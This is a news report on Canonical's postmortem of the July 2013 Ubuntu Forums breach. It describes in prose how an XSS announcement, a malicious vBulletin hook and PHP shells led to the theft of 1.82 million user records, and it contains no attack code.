Canonical has published a postmortem on the recent Ubuntu Forums hack and has shared a blow-by-blow account on how the attack was carried out.
At 16:58 UTC on 14 July 2013, the attacker was able to log in to a moderator account owned by a member of the Ubuntu Community.
This moderator account had permissions to post announcements to the Forums. Announcements in vBulletin, the Forums software, may be allowed to contain unfiltered HTML and do so by default.
The attacker posted an announcement and then sent private messages to three Forum administrators (also members of the Ubuntu community) claiming that there was a server error on the announcement page and asking the Forum administrators to take a look.
One of the Forum administrators quickly looked at the announcement page, saw nothing wrong and replied to the private message from the attacker saying so. 31 seconds after the Forum administrator looked at the announcement page (and before the administrator even had time to reply to the private message), the attacker logged in as that Forum administrator.
Based on the above and conversations with the vBulletin support staff, we believe the attacker added an XSS attack in the announcement they posted which sent the cookies of any visitor to the page to the attacker.
Once the attacker gained administrator access in the Forums they were able to add a hook through the administrator control panel. Hooks in vBulletin are arbitrary PHP code which can be made to run on every page load. The attacker installed a hook allowing them to execute arbitrary PHP passed in a query string argument. They used this mechanism to explore the environment and also to upload and install two widely available PHP shell kits. The attacker used these shell kits to upload and run some custom PHP code to dump the “user’ table to a file on disk which they then downloaded.
The attacker returned on 20 July to upload the defacement page.
What they don’t know is how the hacker managed to access the moderator attack in the first place, and what XSS attack he used because the announcement containing it was deleted by the administrators before they were aware of the attack in progress.
They confirmed the exfiltration of the table containing usernames, email addresses, and salted and hashed passwords for all the Forum users (1.82 million of them), but said that they believe that the attacker wasn’t able to gain access to the Forums front end servers, the Ubuntu code repository and update mechanism, nor to any other Canonical or Ubuntu services.
Naturally, they proceeded to clean up the mess and implement a slew of new changes that should make similar attacks much harder in the future. For more details about the changes, check out the blog post.